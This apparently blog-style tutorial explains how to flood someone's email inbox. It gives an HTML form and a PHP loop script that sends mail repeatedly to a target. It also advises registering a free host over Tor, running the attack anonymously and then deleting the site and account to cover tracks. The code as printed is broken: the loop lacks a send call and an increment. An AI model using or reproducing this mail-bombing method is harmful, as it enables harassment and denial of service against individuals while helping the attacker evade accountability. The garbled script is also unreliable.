web stats

How to Flood an Email Address

Have you ever wondered how to spam someone’s email address? Well, thanks to a very short script, it’s easy to do. Firstly, the attacker will need access to a free web-host which has PHP and a mail server. I’m pretty sure that Freehostia has both. It’s safest to preserve anonymity by registering behind a TOR connection to hide your IP address.

The Email Spamming Form

This isn’t totally necessary, but it helps you get a visual idea of what’s going into the script. The HTML form can be used to enter various fields, such as the target email address, the message which will be sent, and the number of times the email is sent. The attacker should create a page on their website which has the following code in;

<form action="script.php" method="POST">
To: <input type="text" name="to" /> <br />
Subject: <input type="text" name="subject" /> <br />
Message: <input type="text" name="message" /> <br />
From: <input type="text" name="from" /> <br />
Times To Send: <input type="text" name="sendtimes" /> <br />
<input type="submit" value="Send!" />

The Email Spamming Script

Once the HTML form is in place, the attacker needs to create a script called “script.php” which takes everything entered into the form and places it inside a script using variables. The script then runs, sending emails to the target and potentially flooding the living shit out of them! Here’s what the script looks like;

$number = 0;
$to = $_POST['to'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$from = $_POST['from'];
$headers = "From: $from";
$sendtimes = $_POST['sendtimes'];

while ($number < $sendtimes) {
echo "Mail Sent $sendtimes times!";

The script is written in PHP. It uses a loop to control how many times the email is sent. Basically, so long as the value of $number is less than $sendtimes, the script will loop over. Once $number is equal to or greater than $sendtimes, the script will stop running.

So, the script and form is in place – what now?

The attacker would then do the following things to make sure that his target gets the bollocking he deserves!

Using TOR, access the free website.
Enter the required details into the form, specifying how many times to send the email.
Wait for the confirmation!
Delete the website, and the account.

Additional Notes

I don’t support the use of this script in any way, nor do I claim it as mine. It’s just some PHP code – remember that. If you decide to be an idiot and spam someone without their permission, then it’s absolutely nothing to do with me. I hope you enjoyed it!



Leave a Reply